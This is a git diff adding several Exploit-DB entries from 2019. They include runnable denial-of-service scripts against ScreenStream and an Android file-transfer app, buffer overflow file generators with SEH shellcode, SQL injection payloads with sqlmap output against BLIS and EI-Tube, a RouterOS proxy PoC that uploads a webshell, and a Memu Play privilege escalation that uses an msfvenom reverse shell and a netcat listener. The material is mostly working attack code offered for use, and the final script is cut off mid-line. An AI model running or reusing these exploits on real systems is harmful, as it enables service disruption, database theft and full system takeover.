diff --git a/exploits/android/dos/46443.py b/exploits/android/dos/46443.py new file mode 100755 index 000000000..448ecf7a7 --- /dev/null +++ b/exploits/android/dos/46443.py @@ -0,0 +1,49 @@ +#!/usr/bin/python +#coding: utf-8 + +# ************************************************************************ +# * Author: Marcelo Vázquez (aka s4vitar) * +# * ScreenStream 3.0.15 Remote Denial of Service (DoS) * +# ************************************************************************ + +# Exploit Title: ScreenStream 3.0.15 Remote Denial of Service (DoS) +# Date: 2019-02-21 +# Exploit Author: Marcelo Vázquez (aka s4vitar) +# Vendor Homepage: http://mobzapp.com/mirroring/index.html +# Software Link: https://play.google.com/store/apps/details?id=info.dvkr.screenstream&hl=en +# Version: <= ScreenStream 3.0.15 +# Tested on: Android + +import sys, requests, threading, signal + +def handler(signum, frame): + print '\nFinishing program...\n' + sys.exit(0) + +if len(sys.argv) != 3: + print "\nUsage: python " + sys.argv[0] + " \n" + print "Example: python " + sys.argv[0] + " 192.168.1.125 8080\n" + sys.exit(0) + +def startAttack(url): + url_destination = url + '/start-stop' + headers = {'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.5', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'Accept': '*/*', 'Referer': url, 'Connection': 'close'} + + r = requests.post(url_destination, headers=headers) + +if __name__ == '__main__': + + signal.signal(signal.SIGINT, handler) + url = 'http://' + sys.argv[1] + ':' + sys.argv[2] + + threads = [] + + for i in xrange(0, 10000): + t = threading.Thread(target=startAttack, args=(url,)) + threads.append(t) + + for x in threads: + x.start() + + for x in threads: + x.join() \ No newline at end of file diff --git a/exploits/android/dos/46445.c b/exploits/android/dos/46445.c new file mode 100644 index 000000000..6cd50c643 --- /dev/null +++ b/exploits/android/dos/46445.c @@ -0,0 +1,102 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +// ************************************************************************ +// * Author: Marcelo Vázquez (aka s4vitar) * +// * AirDrop 2.0 Remote Denial of Service (DoS) * +// ************************************************************************ + +// Exploit Title: AirDrop 2.0 Remote Denial of Service (DoS) +// Date: 2019-02-21 +// Exploit Author: Marcelo Vázquez (aka s4vitar) +// Vendor Homepage: https://support.apple.com/en-us/HT204144 +// Software Link: https://apkpure.com/airdrop-wifi-file-transfer/com.airdrop.airdroid.shareit.xender.filetransfer +// Version: <= AirDrop 2.0 +// Tested on: Android + +int make_socket(char *host, char *port) { + struct addrinfo hints, *servinfo, *p; + int sock, r; + + memset(&hints, 0, sizeof(hints)); + hints.ai_family = AF_UNSPEC; + hints.ai_socktype = SOCK_STREAM; + if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) { + fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r)); + exit(0); + } + for(p = servinfo; p != NULL; p = p->ai_next) { + if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) { + continue; + } + if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) { + close(sock); + continue; + } + break; + } + if(p == NULL) { + if(servinfo) + freeaddrinfo(servinfo); + fprintf(stderr, "No connection could be made\n"); + exit(0); + } + if(servinfo) + freeaddrinfo(servinfo); + fprintf(stderr, "[Connected -> %s:%s]\n", host, port); + return sock; +} + +void broke(int s) { + // Nothing to do +} + +#define CONNECTIONS 8 +#define THREADS 48 + +void attack(char *host, char *port, int id) { + int sockets[CONNECTIONS]; + int x, g=1, r; + for(x=0; x!= CONNECTIONS; x++) + sockets[x]=0; + signal(SIGPIPE, &broke); + while(1) { + for(x=0; x != CONNECTIONS; x++) { + if(sockets[x] == 0) + sockets[x] = make_socket(host, port); + r=write(sockets[x], "\0", 1); + if(r == -1) { + close(sockets[x]); + sockets[x] = make_socket(host, port); + } + } + usleep(300000); + } +} + +int main(int argc, char **argv) { + + int x; + + if (argc < 3) { + printf("Usage: ./AirDrop_DoS \n"); + exit(-1); +} + + for(x=0; x != THREADS; x++) { + if(fork()) + attack(argv[1], argv[2], x); + usleep(200000); + } + getc(stdin); + return 0; +} \ No newline at end of file diff --git a/exploits/hardware/remote/46444.txt b/exploits/hardware/remote/46444.txt new file mode 100644 index 000000000..e0671ad43 --- /dev/null +++ b/exploits/hardware/remote/46444.txt @@ -0,0 +1,44 @@ +# CVE-2019-3924 + +A remote, unauthenticated attacker can proxy traffic through RouterOS via probes sent to the agent binary. This PoC demonstrates how to exploit a LAN host from the WAN. A video demonstrating the attack can be found here: + +* https://www.youtube.com/watch?v=CxyOtsNVgFg + +A Tenable Research Advisory for the vulnerability can be found here: + +* https://www.tenable.com/security/research/tra-2019-07 + +## Compilation +This code was tested on Ubuntu 18.04. There is a dependency on boost, gtest, and cmake. Simply install them like so: + +```sh +sudo apt install libboost-dev cmake +``` + +To compile simply do the following: + +```sh +cd routeros/poc/cve_2019_3924/ +mkdir build +cd build +cmake .. +``` + +## Sample Usage + +```sh +albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$ ./nvr_rev_shell --proxy_ip 192.168.1.70 --proxy_port 8291 --target_ip 10.0.0.252 --target_port 80 --listening_ip 192.168.1.7 --listening_port 1270 +[!] Running in exploitation mode +[+] Attempting to connect to a MikroTik router at 192.168.1.70:8291 +[+] Connected! +[+] Looking for a NUUO NVR at 10.0.0.252:80 +[+] Found a NUUO NVR! +[+] Uploading a webshell +[+] Executing a reverse shell to 192.168.1.7:1270 +[+] Done! +albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$ +``` + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46444.zip \ No newline at end of file diff --git a/exploits/linux/dos/46439.py b/exploits/linux/dos/46439.py new file mode 100755 index 000000000..7e6010f77 --- /dev/null +++ b/exploits/linux/dos/46439.py @@ -0,0 +1,23 @@ +# -*- coding: utf-8 -*- +# Exploit Title: Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC) +# Date: 20/02/2019 +# Author: Alejandra Sánchez +# Vendor Homepage: https://valentina-db.com/en/ +# Software Link: https://www.valentina-db.com/en/all-downloads/vstudio/current/vstudio_x64_lin-deb?format=raw +# Version: 9.0.5 +# Tested on: Linux kali amd64 + +# Proof of Concept: +# 1.- Run the python script "vstudio.py", it will create a new file "vstudio.txt" +# 2.- Copy the text from the generated vstudio.txt file to clipboard +# 3.- Open VStudio +# 4.- Go to File > Connect to... +# 5.- Click on Valentina Server or SQLite Server +# 6.- Paste clipboard in 'Host' field +# 7.- Click on button -> Connect +# 8.- Crashed + +buffer = "\x41" * 264 +f = open ("vstudio.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/php/webapps/46438.txt b/exploits/php/webapps/46438.txt new file mode 100644 index 000000000..8075f271a --- /dev/null +++ b/exploits/php/webapps/46438.txt @@ -0,0 +1,75 @@ +# Exploit Title: C4G Basic Laboratory Information System (BLIS) 3.4 - Multiples SQL Injection +# Date: 01/31/2019 +# Software Links/Project: https://github.com/C4G/BLIS | http://blis.cc.gatech.edu/index.php +# Version: C4G Basic Laboratory Information System v3.4 +# Exploit Author: Carlos Avila +# Category: webapps +# Tested on: Windows 8.1 / Ubuntu Linux +# Contact: http://twitter.com/badboy_nt + +1. Description + +C4G Basic Laboratory Information System (BLIS) is an open-source system to track patients, specimens and laboratory results. C4G BLIS is a joint initiative of Computing for Good (C4G) at the Georgia Institute of Technology, the Centers for Disease Control and Prevention (CDC) and Ministries of Health of several countries in Africa. + +This allows unauthenticated remote attacker to execute arbitrary SQL commands and obtain private information. Admin or users valid credentials aren't required. In a deeper analysis other pages are also affected with the vulnerability over others inputs. + +It written in PHP it is vulnerable to SQL Injection on multiples occurrences. The parameters affected are detailed below: + +http://192.168.6.101:4001/ajax/users_select.php [parameters affected via GET method: site] + + + +2. Proof of Concept + + + +sunday:sqlmap badboy_nt$ python sqlmap.py --url "http://192.168.6.101:4001/ajax/users_select.php?site=1275969" --random-agent --tamper randomcase --level 3 --dbms mysql --threads 3 --dbs + ___ + __H__ + ___ ___[)]_____ ___ ___ {1.3.1.83#dev} +|_ -| . [,] | .'| . | +|___|_ [(]_|_|_|__,| _| + |_|V... |_| http://sqlmap.org + +[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program + +[*] starting @ 15:51:33 /2019-02-01/ + +[15:51:33] [INFO] loading tamper module 'randomcase' +[15:51:33] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16' from file '/Users/badboy_nt/Tools/sqlmap/txt/user-agents.txt' +[15:51:34] [INFO] testing connection to the target URL +sqlmap resumed the following injection point(s) from stored session: +--- +Parameter: site (GET) + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: site=1275969 AND (SELECT * FROM (SELECT(SLEEP(5)))owvW)-- Lzob + + Type: UNION query + Title: Generic UNION query (random number) - 12 columns + Payload: site=1275969 UNION ALL SELECT CONCAT(0x71626a7071,0x5754617757446f465a4f41676352594968504a457651676852694d506c69796b6b567643736e6967,0x7171716a71),4936,4936,4936,4936,4936,4936,4936,4936,4936,4936,4936-- tnMf +--- +[15:51:35] [WARNING] changes made by tampering scripts are not included in shown payload content(s) +[15:51:35] [INFO] testing MySQL +[15:51:36] [INFO] confirming MySQL +[15:51:37] [INFO] the back-end DBMS is MySQL +web server operating system: Windows +web application technology: Apache 2.2.11, PHP 5.4.32 +back-end DBMS: MySQL >= 5.0.0 +[15:51:37] [INFO] fetching database names +[15:51:38] [INFO] used SQL query returns 4 entries +[15:51:38] [INFO] starting 3 threads +[15:51:39] [INFO] retrieved: 'information_schema' +[15:51:40] [INFO] retrieved: 'blis_127' +[15:51:41] [INFO] retrieved: 'blis_revamp' +[15:51:43] [INFO] retrieved: 'mysql' +available databases [4]: +[*] blis_127 +[*] blis_revamp +[*] information_schema +[*] mysql + + +3. Solution: + +Application inputs must be validated correctly throughout the development of the project. \ No newline at end of file diff --git a/exploits/php/webapps/46440.txt b/exploits/php/webapps/46440.txt new file mode 100644 index 000000000..bfa55c99d --- /dev/null +++ b/exploits/php/webapps/46440.txt @@ -0,0 +1,14 @@ +# Exploit Title: PHP EI-Tube Script - Sql Injection +# Date: 2019-02-21 +# Exploit Author: Meisam Monsef - meisamrce@gmail.com +# Vendor Homepage: https://codecanyon.net/item/eitube-youtube-api-v3-site-builder/22722912?s_rank=17 +# Version: 3 +# Tested on: ubuntu +# special thanks : Alireza Noorkazemi - A-H - Akhzari - +# Net Hunter (Pouya) - M.Azizi - EBI -Navid - Shahab RA - SAM.SH +# M.I - Nikavar - Hosseini +# very special thanks : esecurity.ir + +Exploit: +https://target/search?q=-999%22+[sql+command]+%23 +https://target/search?q=-999%22+union+select+1,user(),3,4,5,version()+%23 \ No newline at end of file diff --git a/exploits/windows/dos/46442.py b/exploits/windows/dos/46442.py new file mode 100755 index 000000000..a2d0d1cd6 --- /dev/null +++ b/exploits/windows/dos/46442.py @@ -0,0 +1,99 @@ +#!/usr/bin/python + +# Exploit Title: VirtualVCR-Max .0a Overflow PoC +# Google Dork: N/A +# Date: 21/02/2019 +# Exploit Author: Wade Guest +# Vendor Homepage: http://virtualvcr.sourceforge.net/ +# Software Link: https://sourceforge.net/projects/virtualvcr/ +# Version: Max Version .0a +# Tested on: Win XP SP3 +# CVE : N/A] + + +# Launch VirtualVCR +# Run the python script to generate the 'exploit.vcr' file +# Right-click the icon in the task bar +# Options -> Load Profile +# Select 'exploit.vcr' +# Right-click the icon and select "Settings" + +file_content = "" +file_content += """ +[VirtualVCR] +AudioInputLevel=200 +SaveCapStats=0 +AlwaysOnTop=0 +HideBars=0 +AudioInputIndex=-1 +ResampleAudioTo=10000000 +AudioResampleType=0 +StreamOffsetType=0 +VideoBrightness=-1 +VideoHue=-1 +VideoContrast=-1 +VideoSaturation=-1 +VideoColour=1 +VideoGamma=-1 +VideoSharpness=-1 +TunerChannel=2 +TunerCountry=61 +TunerInputType=61 +TunerMode=0 +AudioDelay=0 +ShowAudioScope=0 +ShowHistogram=0 +LogAVdiff=0 +UseSmartTee=0 +CapStatRelative=0 +WantCaptureStats=0 +ShowOnStop=0 +TurnOffScrnSaver=1 +AnimateTrayIcon=0 +AVIcompatINDEX=0 +UseAudioResample=0 +SyncUsingStreamOffset=0 +CaptureFile=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +XMLTVFile= +VideoColourFormat=RGB24 +WantPreview=0 +FrameRate=400000 +UseFrameRate=0 +CaptureAudio=1 +MasterStream=-1 +UseTimeLimit=0 +TimeLimit=0 +CustomWidth=320 +CustomHeight=240 +VideoCompCodec=end +AudioCompCodec=end +CompressVideo=0 +CompressAudio=0 +AudioCapabilityIndex=-1 +FreeSpaceLimit=0 +UseFreeSpace=0 +VideoInputIndex=-1 +UsePreFilters=0 +AppendStampToName=0 +Audio_nChannel=2 +Audio_nSamplesPerSec=44100 +Audio_nAvgBytesPerSec=176400 +Audio_nBlockAlign=4 +Audio_wBitsPerSample=16 +Audio_wFormatTag=1 +VideoDevice=0 +AudioDevice=0 +QuitWhenDone=0 +QuitStyle=0 +[Filters] +FILTER0=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB +[ChannelINFO] +0-ID=-1 +0-MAP=-1 +0-XMLID=none +0-NAME=none +""" + + +file = open("exploit.vcr","w+") +file.write(file_content) \ No newline at end of file diff --git a/exploits/windows/local/46437.txt b/exploits/windows/local/46437.txt new file mode 100644 index 000000000..02f9fee55 --- /dev/null +++ b/exploits/windows/local/46437.txt @@ -0,0 +1,68 @@ +# Exploit Title: Memu Play 6.0.7 - Privilege Escalation (PoC) +# Date: 20/02/2019 +# Author: Alejandra Sánchez +# Vendor Homepage: https://www.memuplay.com/ +# Software Link: https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release +# Version: 6.0.7 +# Tested on: Windows 10 / Windows 7 + + +# Description: +# Memu Play 6.0.7 suffers from Privilege Escalation due to insecure file permissions + +# Prerequisites +# Local, Low privilege access with restart capabilities + +# Details +# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below. +# A low privilege account is able to rename the MemuService.exe file located in this same path and replace +# with a malicious file that would connect back to an attacking computer giving system level privileges +# (nt authority\system) due to the service running as Local System. +# While a low privilege user is unable to restart the service through the application, a restart of the +# computer triggers the execution of the malicious file. + + +C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe" +C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Users:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + + +Successfully processed 1 files; Failed processing 0 files + + +C:\>sc qc MEmuSVC +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: MEmuSVC + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe + LOAD_ORDER_GROUP : + TAG : 0 + + +# Proof of Concept + +1. Generate malicious .exe on attacking machine + msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe + +2. Setup listener and ensure apache is running on attacking machine + nc -lvp 443 + service apache2 start + +3. Download malicious .exe on victim machine + Open browser to http://192.168.1.130/MemuService.exe and download + +4. Overwrite file and copy malicious .exe. + Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak + Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\ + +5. Restart victim machine + +6. Reverse Shell on attacking machine opens + C:\Windows\system32>whoami + whoami + nt authority\system \ No newline at end of file diff --git a/exploits/windows/local/46441.py b/exploits/windows/local/46441.py new file mode 100755 index 000000000..7cbf22cda --- /dev/null +++ b/exploits/windows/local/46441.py @@ -0,0 +1,67 @@ +# Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow - (SEH) +# Date: 21.02.2019 +# Exploit Author: Matteo Malvica +# Vendor Homepage: https://realterm.sourceforge.io/ +# Software Link: https://sourceforge.net/projects/realterm/files/ +# Version: 2.0.0.70 +# Category: Local +# Contact: https://twitter.com/matteomalvica +# Version: CloudMe Sync 1.11.2 +# Tested on: Windows 7 SP1 x64 +# Originail PoC https://www.exploit-db.com/exploits/46391 + +# 1.- Run the python script it will create a new file "carbonara.txt" +# 2.- Copy the content of the new file 'carbonara.txt' to clipboard +# 3.- Open realterm.exe +# 4.- Go to 'Echo Port' tab +# 5.- Paste clipboard in 'Port' field +# 6.- Click on button -> Change +# 7.- Check 'Echo On' or +# 8.- Box! + + +import socket +import struct + +''' +badchars: 0x20,0x0a +arwin.exe user32.dll MessageBoxA +arwin - win32 address resolution program - by steve hanna - v.01 +MessageBoxA is located at 0x747cfdae in user32.dll +''' +shellcode = ( +"\x33\xc0" # XOR EAX,EAX +"\x50" # PUSH EAX => padding for lpCaption +"\x68\x7a\x6f\x21\x21" # PUSH "zo!!" +"\x68\x61\x76\x61\x6e" # PUSH "avan" +"\x8B\xCC" # MOV ECX,ESP => PTR to lpCaption +"\x50" # PUSH EAX => padding for lpText +"\x68\x6e\x7a\x6f\x21" # PUSH "nzo!" +"\x68\x61\x76\x61\x21" # PUSH "ava!" +"\x8B\xD4" # MOV EDX,ESP => PTR to lpText +"\x50" # PUSH EAX - uType=0x0 +"\x51" # PUSH ECX - lpCaption +"\x52" # PUSH EDX - lpText +"\x50" # PUSH EAX - hWnd=0x0 +"\xBE\xae\xfd\x7c\x74" # MOV ESI,USER32.MessageBoxA <<< hardcoded address +"\xFF\xD6") # CALL ESI + +pad1="\x90"*(142-len(shellcode)) +pad2 = "\x42" * 118 +nseh = "\xEB\x80\x90\x90" +jmp_back = "\xEB\x80\x90\x90" +short_jmp = "\xEB\x12\x90\x90" +seh = struct.pack('